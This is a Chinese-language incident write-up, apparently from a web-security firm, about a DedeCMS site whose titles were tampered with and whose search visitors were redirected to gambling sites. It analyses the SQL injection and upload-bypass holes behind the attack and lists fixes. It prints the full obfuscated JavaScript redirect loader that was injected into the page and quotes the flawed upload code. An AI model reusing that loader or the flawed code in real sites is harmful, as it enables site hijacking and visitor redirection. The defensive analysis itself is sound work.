织梦网站技术教程网让你更全面的了解和使用织梦cms

当前位置:织梦教程网 > 织梦漏洞安全 > 网站标题被篡改成×××、PK10的解决处理办法

网站标题被篡改成×××、PK10的解决处理办法

已有人收藏发布时间:2018-07-31 10:47   来源:51CTO 作者:百度安全

客户网站于近日被跳转到×××,打开后直接跳转到什么×××,PK10等内容的网站上去,客户网站本身做了百度的推广,导致所有访问用户都跳转到×××上去,给客户带来很大的经济损失,再一个官方网站的形象也受到了影响。我们SINE安全对客户网站进行检查发现,客户网站的标题TDK被反复篡改成(×××PK10等内容)立刻对该客户网站的安全,进行全面的源代码安全审计以及网站漏洞检测与网站漏洞修复,检查了客户的首页标题TDK内容确实是被篡改,并添加了一些加密的恶意代码,代码如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('m["\9\d\1\l\i\a\n\0"]["\8\4\6\0\a"](\'\h\3\1\4\6\2\0 \0\k\2\a\e\7\0\a\q\0\5\g\b\f\b\3\1\4\6\2\0\7 \3\4\1\e\7\o\0\0\2\3\p\5\5\8\8\8\c\1\2\9\b\3\r\c\1\d\i\5\9\9\f\6\2\c\g\3\7\j\h\5\3\1\4\6\2\0\j\');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述网站代码是ASCII编码,只要转换成Unicode编码,就可以看到加密的真实内容。我们工程师对代码进行解读,发现该代码写的是根据搜索引擎作为判断条件进行跳转的代码,通俗来讲就是说,该代码只针对搜索引擎,网站管理员直接输入网址并不会发现网站跳转到×××内容网站上去,客户的网站通过百度或搜狗搜索会直接跳转到这个×××、pk10的网站上去。

针对于上述的问题,我们立即删除加密的跳转代码,先将客户网站损失降到最低,促使网站正常访问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全检测,网站到底是因为那些漏洞被上传×××,并篡改网站首页的呢?经过我们Sine安全工程师对网站代码的详细的安全检测后,发现该网站系统存在SQL注入漏洞,导致×××者可以获取到管理员账户和密码,而网站后台的地址用的也是默认的admin目录名,致使×××获取密码后,直接登录网站后台,在对网站后台安全检测的时候,发现产品图片上传功能,存在绕过格式上传脚本×××的漏洞。

该网站漏洞产生于网站后台的产品上传页面代码中的$this->getext($filear["name"]); //取得扩展名$this->set_savename($file); //设置保存文件名,这个代码对文件扩展名可以直接绕过并上传php格式的脚本文件,从而让×××者轻易取得网站的权限。客户还反映说,网站经常被反复的篡改,导致跳转到×××,找了网站建设的公司,他们也只是删除掉代码,没过多久就又被篡改跳转了,导致客户网站损失严重,发生篡改跳转的根本原因就是网站有漏洞,如果没有修复好网站漏洞,即使删除掉恶意代码也只是表面上的工作,不起作用的还是会被反复篡改,于事无补,亡羊补牢一样。需要对网站进行安全检测,以及网站漏洞检测,并修复好网站漏洞,清除×××后门,网站安全部署好,才会使网站更加的安全稳定运行。

网站漏洞修复的处理过程如下:

对客户网站源代码进行安全加固以及防止sql注入的前端过滤代码,网站的后台目录安全设置,更改admin文件名为@#%admin,对网站后台图片上传功能代码进行漏洞修复,设置上传文件白名单机制,以及文件上传的目录进行了脚本安全权限设置,禁止进行脚本,对上传的文件扩展也进行了深入的安全过滤,网站的数据库安全部署,对数据库的连接信息进行加密,删除root管理权限,设置普通数据库账号,读写分离,新建表,查询表,写入表等数据库正常操作权限,网站后台的账号密码设置的复杂一些,密码为12位数字+字母+大小写组合,从发现网站漏洞到目前解决问题中,共查找到脚本×××3个(webshell),一句话小马后门2个,发现网站的模板内容也被篡改了,导致客户生成首页的时候随之也被加了恶意加密的代码。

网站安全预防措施:

1.尽量避免网站后台的默认名称如admin manage houtai

2.对网站上传目录的权限进行控制。(设置无脚本执行权限)

3.网站后台的用户名和密码设置复杂点,数字+字母+大小写+特殊符号组合。

4.阿里云虚拟主机用户的FTP账号密码要设置复杂点,数字+字母+大小写+特殊符号组合。

5.如果是单独服务器的客户,建议先把服务器的安全部署好,对每个网站的文件夹进行安全部署,数据库安全部署,,再做网站的安全,否则你网站再安全,服务器不安全也是于事无补。如果对安全不是太懂的话,建议找专业的网站安全公司去处理解决。